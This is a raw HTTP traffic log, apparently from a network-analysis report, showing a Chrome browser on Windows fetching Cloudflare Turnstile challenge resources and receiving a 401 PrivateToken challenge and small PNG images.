2024-07-09 18:52:19 UTC	810	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/8a0a82987970c32e/1720551138045/83eca55ffefc35a206bc834e1ad7c87ee041961d6ecd33d2ac08f2651b37ce79/RS367FsQ-4V6NbU HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:19 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Tue, 09 Jul 2024 18:52:19 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-07-09 18:52:19 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 67 2d 79 6c 58 5f 37 38 4e 61 49 47 76 49 4e 4f 47 74 66 49 66 75 42 42 6c 68 31 75 7a 54 50 53 72 41 6a 79 5a 52 73 33 7a 6e 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gg-ylX_78NaIGvINOGtfIfuBBlh1uzTPSrAjyZRs3znkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-07-09 18:52:19 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:20 UTC	781	OUT	GET /cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:20 UTC	200	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:20 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8a0a82b3e8ef1865-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:20 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 4a 08 02 00 00 00 e2 ca 39 b8 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRJ9IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:21 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:21 UTC	200	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:21 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8a0a82b94e0fc348-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:21 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 4a 08 02 00 00 00 e2 ca 39 b8 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRJ9IDAT$IENDB`